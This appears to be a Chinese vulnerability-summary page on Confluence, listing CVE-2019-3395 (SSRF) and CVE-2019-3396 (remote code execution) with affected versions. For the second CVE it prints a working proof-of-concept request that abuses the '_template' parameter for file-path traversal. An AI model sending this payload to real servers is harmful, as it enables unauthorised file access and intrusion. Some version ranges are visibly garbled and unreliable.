应用安全 - Java Web 应用 - Confluence - 漏洞汇总
2024-09-05 18:32:19
CVE-2019-3395
Date:
-- 类型:
SSRF
影响范围:
- Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
- Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
- Confluence 6.6.* < 6.6.12
- Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
- Confluence 6.12.* < 6.12.3
- Confluence 6.13.* < 6.13.3
- Confluence 6.14.* < 6.14.2
CVE-2019-3396
Date:
-- 类型:
远程代码执行 复现
POC
/rest/tinymce/1/macro/preview
{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}
影响范围:
- Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
- Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
- Confluence 6.6.* < 6.6.12
- Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
- Confluence 6.12.* < 6.12.3
- Confluence 6.13.* < 6.13.3
- Confluence 6.14.* < 6.14.2
最新文章
- Windows下Nginx配置SSL实现Https访问(包含证书生成)
- webhdfs 使用shell下载文件
- Oracle以及SDE维护常用命令-查看表空间等
- springmvc之图片上传
- ubuntu 安装Firefox 29.0
- 惩罚因子(penalty term)与损失函数(loss function)
- Anywhere服务建立及连接步骤
- Installation of Theano on Windows
- 将Tab栏居中的方法
- PhpCms_V9笔记
- Python笔记2.1
- 使用mysql5.7新特性(虚拟列)解决使用前通配符性能问题
- 【图文详解】Hadoop集群搭建(CentOs6.3)
- Go之运算符
- 关于Eclipse导入项目jsp出现红色叉的解决办法
- Java Web(三) 会话机制,Cookie和Session详解(转载)
- Vue笔记:生命周期和钩子函数
- [转]Hadoop参数汇总
- 软件开发模式,DevOps
- 20155316 2016-2017-2 《Java程序设计》第5周学习总结